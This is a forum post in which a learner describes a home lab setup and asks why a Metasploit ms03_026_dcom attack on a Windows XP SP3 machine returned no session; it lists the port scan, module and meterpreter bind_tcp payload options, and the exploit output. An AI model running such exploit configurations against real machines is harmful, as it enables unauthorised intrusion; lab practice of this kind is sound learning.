Hi guys, i start working in my new lab to learn metasploit completely so i used ms03_026_dcom exploit to attack to a windows xp machine but i cant get access is any body know why? here is the complete details:
ms03_026 vulnerability
=================================================
Lab setup:
Attacker Machine: Bactrack 5 R2 Gnome
IP Address: 192.168.137.67
Victem's Machine: Windows XP SP 3
IP Address: 192.168.137.165
=================================================
Victem's Portscan output:
PORT STATE SERVICE
21/tcp open ftp
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-term-serv
=================================================
Metasploit Framework 4.2
Exploit= windows/dcerpc/ms03_026_dcom
Payload= windows/meterpreter/bind_tcp
Module options (exploit/windows/dcerpc/ms03_026_dcom):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.137.165 yes The target address
RPORT 135 yes The target port
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LPORT 4444 yes The listen port
RHOST 192.168.137.165 no The target address
Exploit target:
Id Name
-- ----
0 Windows NT SP3-6a/2000/XP/2003 Universal
=================================================
Exploitation Process output
- Started bind handler
- Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
- Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.137.165[135] ...
- Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.137.165[135] ...
- Sending exploit ...
- Exploit completed, but no session was created.
=================================================
Thankx